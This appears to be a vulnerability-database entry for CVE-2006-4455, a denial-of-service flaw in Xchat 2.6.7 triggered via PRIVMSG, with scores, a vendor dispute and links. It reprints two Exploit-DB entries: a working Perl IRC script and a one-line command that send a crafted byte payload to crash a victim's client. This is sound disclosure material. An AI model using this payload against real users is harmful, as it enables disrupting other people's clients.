CVE-2006-4455
published 2006-08-30CVE-2006-4455: Unspecified vulnerability in Xchat 2.6.7 and earlier allows remote attackers to cause a denial of service (crash) via unspecified vectors involving the PRIVMSG…
PriorityP418medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
4.99%
91.1th percentile
Unspecified vulnerability in Xchat 2.6.7 and earlier allows remote attackers to cause a denial of service (crash) via unspecified vectors involving the PRIVMSG command. NOTE: the vendor has disputed this vulnerability, stating that it does not affect 2.6.7 "or any recent version"
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xchat | xchat | <= 2.6.7 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
XChat 2.6.7 (Windows) - Remote Denial of Service
exploitdb·2006-08-08
CVE-2006-4455 XChat 2.6.7 (Windows) - Remote Denial of Service
XChat 2.6.7 (Windows) - Remote Denial of Service
---
#!/usr/bin/perl
# rewritten because perl is more elegant than php
# payload taken from original that ratboy submitted
use strict;
use Net::IRC;
my ($nick, $server, $port, $channel, $victim) = @ARGV;
my $irc = new Net::IRC;
my $connect = $irc -> newconn (Nick => "$nick",
Server => "$server",
Port => $port,
Ircname=> 'whatever')
or die "$0: Error\n";
my $payload = "\x9x\xF0\x92\x8D\x85\xF1\xA5\x90\xB4\xF1\x96\x9E\x85\xF1\xA6\x8D\xA5\xF1\xB8\xA5\x85\xF1\xA7\x95\xA8\x29\xF2\x95\x95\x82";
sub on_connect {
my $self = shift;
$self->join("#".$channel);
$self->privmsg($victim, "$payload");
}
$connect->add_handler('376', \&on_connect);
$irc->start();
# milw0rm.com [2006-08-08]
Exploit-DB
XChat 2.6.7 (Windows) - Remote Denial of Service
exploitdb·2006-08-07
CVE-2006-4455 XChat 2.6.7 (Windows) - Remote Denial of Service
XChat 2.6.7 (Windows) - Remote Denial of Service
---
/str0ke
# /exec -o perl -e 'print "\x9x\xF0\x92\x8D\x85\xF1\xA5\x90\xB4\xF1\x96\x9E\x85\xF1\xA6\x8D\xA5\xF1\xB8\xA5\x85\xF1\xA7\x95\xA8\x29\xF2\x95\x95\x82"'
?>
# milw0rm.com [2006-08-07]
No writeups or analysis indexed.
http://forum.xchat.org/viewtopic.php?t=2918http://marc.info/?l=bugtraq&m=115523184321922&w=2http://securitytracker.com/id?1016687http://www.securityfocus.com/bid/19398http://www.xchat.org/https://exchange.xforce.ibmcloud.com/vulnerabilities/28325https://www.exploit-db.com/exploits/2124https://www.exploit-db.com/exploits/2147http://forum.xchat.org/viewtopic.php?t=2918http://marc.info/?l=bugtraq&m=115523184321922&w=2http://securitytracker.com/id?1016687http://www.securityfocus.com/bid/19398http://www.xchat.org/https://exchange.xforce.ibmcloud.com/vulnerabilities/28325https://www.exploit-db.com/exploits/2124https://www.exploit-db.com/exploits/2147
2006-08-30
Published